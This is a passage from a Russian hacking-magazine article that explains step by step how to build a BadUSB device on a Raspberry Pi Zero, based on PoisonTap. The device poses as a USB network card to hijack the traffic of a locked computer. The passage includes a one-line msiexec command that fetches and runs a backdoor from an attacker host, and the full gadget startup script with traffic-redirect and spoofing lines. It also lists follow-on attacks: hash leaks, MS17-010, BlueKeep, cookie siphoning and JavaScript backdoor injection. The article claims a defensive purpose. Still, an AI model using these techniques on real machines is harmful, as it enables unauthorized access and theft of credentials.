Ес­ли у тебя есть воз­можность под­клю­чить к USB-пор­ту ата­куемо­го компь­юте­ра спе­циаль­но под­готов­ленное устрой­ство, ты можешь пол­ностью перех­ватить тра­фик, получить cookies и пароли, взло­мать кон­трол­лер домена, а кон­тро­лиро­вать ход ата­ки по Wi-Fi. Как это реали­зовать? Сей­час рас­ска­жу.

Windows, Linux и macOS по умол­чанию уме­ют авто­мати­чес­ки без учас­тия поль­зовате­ля опоз­навать опре­делен­ные USB-устрой­ства как сетевые кар­ты Ethernet. И, что важ­но, это может про­исхо­дить даже на заб­локиро­ван­ных ПК. Имен­но эта осо­бен­ность и дает воз­можность реали­зовать ата­ку, о которой я рас­ска­жу в сегод­няшней статье. Этот под­вид BadUSB-атак зак­люча­ется в том, что под­клю­чаемое к пор­ту USB устрой­ство пред­став­ляет­ся сетевой кар­той. Одна­ко сов­сем неп­ростой сетевой кар­той... Но обо всем по поряд­ку.

Что отли­чает эту ата­ку от BadUSB-HID? Глав­ное отли­чие в том, что рас­смат­рива­емую ата­ку мож­но реали­зовать на заб­локиро­ван­ном компь­юте­ре. Кро­ме того, для про­веде­ния такой ата­ки не тре­бует­ся скрыт­ное и дли­тель­ное под­клю­чение какого‑либо девай­са, она поз­воля­ет ата­ковать цель за нес­коль­ко минут. Ведь если ПК раз­бло­киро­ван, то мож­но реали­зовать более прос­тую и дей­ствен­ную ата­ку из пре­дыду­щей статьи или прос­то наб­рать на кла­виату­ре коман­ду ска­чива­ния и запус­ка бэк­дора:

msiexec / i https:/ / attacker. tk/ backdoor. msi

В ито­ге на «руч­ную» ком­про­мета­цию оставлен­ной без прис­мотра раз­бло­киро­ван­ной пер­сонал­ки пот­ребу­ется все­го три‑четыре секун­ды! Компь­юте­ры сегод­ня пов­сюду, и тор­чащие наружу USB-пор­ты мож­но уви­деть дос­таточ­но час­то.

Объ­ектом ата­ки может стать заб­локиро­ван­ный компь­ютер, оставлен­ный без прис­мотра на корот­кое вре­мя, либо тер­минал, либо стенд с тор­чащим наружу USB-пор­том.

info Эта статья — часть серии пуб­ликаций о прак­тичес­ких при­емах взло­ма и атак с исполь­зовани­ем под­ручных устрой­ств, которые мож­но соб­рать дома. В этих матери­алах мы рас­кры­ваем прос­тые спо­собы получе­ния несан­кци­они­рован­ного дос­тупа к защищен­ной информа­ции и показы­ваем, как ее огра­дить от подоб­ных атак. Пре­дыду­щая статья серии: «Очень пло­хая флеш­ка. Раз­бира­ем ата­ку BadUSB в деталях».

Теория

Под­клю­чаемое устрой­ство BadUSB-ETH опре­деля­ется как сетевая кар­та Еthernet. На самом деле это не прос­то сетевая кар­та, а устрой­ство, внут­ри которо­го пол­ноцен­ный компь­ютер со сво­ей ОС. И мы реали­зуем дос­таточ­но хит­рую цепоч­ку из мно­жес­тва атак. По сути, это собс­твен­ная, более узко заточен­ная реали­зация Bash Bunny от Hak5. А за осно­ву мы возь­мем откры­тый про­ект PoisonTap.

Пер­вое и самое глав­ное — это то, как мы нас­тра­иваем сеть на ата­куемой машине. В момент под­клю­чения интерфейс имен­но соз­дает­ся, а не под­нима­ется. Это зна­чит, что сра­зу пос­ле под­клю­чения ПК зап­росит нас­трой­ки по DHCP (дефол­тное поведе­ние). В ответ на такой зап­рос наше устрой­ство выда­ет не сов­сем обыч­ную кон­фигура­цию сети, при которой она ста­нет при­ори­тет­ной и перек­роет все активные сетевые под­клю­чения на ата­куемом компь­юте­ре. Дос­тига­ется это через более корот­кие мас­ки мар­шру­тов:

0. 0. 0. 0/ 0 via 10. 10. 0. 1 <- исходный дефолтный маршрут, все пакеты изначально идут по нему 0. 0. 0. 0/ 1 via 1. 0. 0. 1 < - наш маршрут, перекрывающий первые 50% IPv4-сетей 128. 0. 0. 0/ 1 via 1. 0. 0. 1 < - второй маршрут, перекрывающий вторые 50% IPv4-сетей (маска короче, поэтому маршрут приоритетнее)

Во всех сов­ремен­ных ОС мар­шру­тиза­ция в IP-сетях стро­ится по еди­ному прин­ципу: чем короче мас­ка сети у мар­шру­та, тем при­ори­тет­нее мар­шрут. Это глав­ное пра­вило мар­шру­тиза­ции. И в нашем слу­чае мас­ка / 1 чуть короче мас­ки / 0 дефол­тно­го мар­шру­та.

Пос­ле при­мене­ния таких нас­тро­ек нового сетево­го под­клю­чения все пакеты от дру­гих сетевых интерфей­сов пой­дут по новому мар­шру­ту — уже в наше хакер­ское устрой­ство, и мы как бы «вытянем» весь тра­фик. Таким обра­зом, мы смо­жем реаль­но перех­ватывать весь сетевой тра­фик заб­локиро­ван­ного устрой­ства пос­редс­твом обыч­ного USB. Схе­матич­но ата­ка пред­став­лена на рисун­ке ниже.

Не сто­ит забывать, что мы уста­нови­ли и обыч­ный сетевой канал вза­имо­дей­ствия с заб­локиро­ван­ным ПК. Учи­тывая это, на целевой машине может быть запущен целый спектр сетевых атак, который зависит лишь от тво­ей фан­тазии:

NetBIOS Poisoning (Hash leak);

MS17-010, BlueKeep, PrintNightmare;

Bruteforce;

ска­ниро­вание пор­тов, скрин­шоты RDP/WWW и сбор про­чих све­дений.

На­конец, наше устрой­ство явля­ется еще и «супер­шлю­зом», пос­коль­ку сетевой тра­фик, вклю­чая и смеж­ные сетевые интерфей­сы, идет теперь через него. Находясь в позиции «легаль­ного MITM», мы можем запус­тить еще ряд атак, пред­назна­чен­ных для перех­вата тра­фика:

Cookie Siphoning (выкачи­вание cookie в redirect-цик­ле перебо­ра сай­тов по сло­варю);

WebCache Poisoning (внед­рение js-backdoor в ска­чива­емые JavaScript);

Insecure Updates (сиг­нал популяр­ному ПО обно­вить­ся и отправ­ка backdoor);

Passive Sniffing (FTP, SMTP, SMB, HTTP, etc).

Реализация

Ус­трой­ство может быть реали­зова­но на базе мно­жес­тва одноплат­ных решений. Наибо­лее лег­ковес­ное и извес­тное сре­ди них — Raspberry Pi Zero (W). Эта пла­та не пот­ребу­ет допол­нитель­ного питания, необ­ходимое нап­ряжение берет­ся от USB-пор­та компь­юте­ра. С целью инди­кации хода атак для прос­тоты исполь­зуем три све­тоди­ода со сле­дующи­ми ролями:

зе­леный (INFO) — ПК опре­делил наш девайс как сетевую кар­ту Ethernet, и под­нялась сеть;

жел­тый (WARNING) — утеч­ка NetNTLM-хеша или иной чувс­тви­тель­ной информа­ции;

крас­ный (CRITICAL) — обна­руже­на RCE, подоб­ран пароль и тому подоб­ное.

Боль­шинс­тво одноплат­ных ПК снаб­жены GPIO-пинами, с помощью которых мож­но подавать неболь­шое нап­ряжение, необ­ходимое для работы све­тоди­одов.

Со­ответс­твен­но, что­бы зажечь, а потом погасить све­тоди­од, под­клю­чен­ный, нап­ример, к 26-му пину, пот­ребу­ется выпол­нить сле­дующие коман­ды ОС внут­ри пла­ты:

raspi- gpio set 26 op dh sleep 1 raspi- gpio set 26 op dl

Эму­ляция Ethernet-устрой­ства, как и эму­ляция дру­гих видов USB-девай­сов, под­держи­вает­ся непос­редс­твен­но ядром Linux через так называ­емые USB-гад­жеты. Очень кра­сиво такую ата­ку про­демонс­три­ровал Сами Кам­кар (Sami Kamkar) в про­екте под наз­вани­ем PoisonTap:

git clone https:/ / github. com/ samyk/ poisontap ln -s ~/ poisontap / opt/ poisontap

Имен­но этот инс­тру­мент взят за осно­ву, осо­бен­но в эму­ляции сетевой кар­ты, но с некото­рыми улуч­шени­ями:

/home/pi/poisontap/pi_startup.sh

rmmod g_ ether cd / sys/ kernel/ config/ usb_ gadget/ mkdir -p poisontap cd poisontap echo 0x0694 > idVendor echo 0x0005 > idProduct mkdir -p strings/ 0x409 echo "Samy Kamkar" > strings/ 0x409/ manufacturer echo "PoisonTap" > strings/ 0x409/ product # RNDIS mkdir configs/ c. 2 echo "0xC0" > configs/ c. 2/ bmAttributes echo "1" > configs/ c. 2/ MaxPower mkdir configs/ c. 2/ strings/ 0x409 echo "RNDIS" > configs/ c. 2/ strings/ 0x409/ configuration echo "1" > os_ desc/ use echo "0xcd" > os_ desc/ b_ vendor_ code echo "MSFT100" > os_ desc/ qw_ sign mkdir functions/ rndis. usb0 echo "42: 61: 64: 55: 53: 45" > functions/ rndis. usb0/ dev_ addr echo "48: 6f: 73: 74: 50: 44" > functions/ rndis. usb0/ host_ addr echo "RNDIS" > functions/ rndis. usb0/ os_ desc/ interface. rndis/ compatible_ id echo "5162001" > functions/ rndis. usb0/ os_ desc/ interface. rndis/ sub_ compatible_ id ln -s functions/ rndis. usb0 configs/ c. 2 ln -s configs/ c. 2 os_ desc ls / sys/ class/ udc > UDC modprobe g_ ether sleep 10 ifup usb0 ifconfig usb0 up / sbin/ route add -net 0. 0. 0. 0/ 0 usb0 / etc/ init. d/ isc- dhcp- server restart / sbin/ sysctl -w net. ipv4. ip_ forward = 1 #/ sbin/ iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j REDIRECT --to-port 1337 #/ usr/ bin/ screen -dmS dnsspoof / usr/ sbin/ dnsspoof -i usb0 port 53 #/ usr/ bin/ screen -dmS node / usr/ bin/ nodejs / home/ pi/ poisontap/ pi_poisontap. js iptables -t nat -A POSTROUTING -o usb0 -j MASQUERADE

Пос­коль­ку ата­ка кросс‑плат­формен­ная, тре­бует­ся нас­трой­ка эму­ляции сра­зу двух сос­тавных USB-устрой­ств: для сетевых карт RNDIS (Windows) и CDC (Unix). Перек­рытие сетевых интерфей­сов зада­ется в фай­ле dhcpd. conf :

/etc/dhcp/dhcpd.conf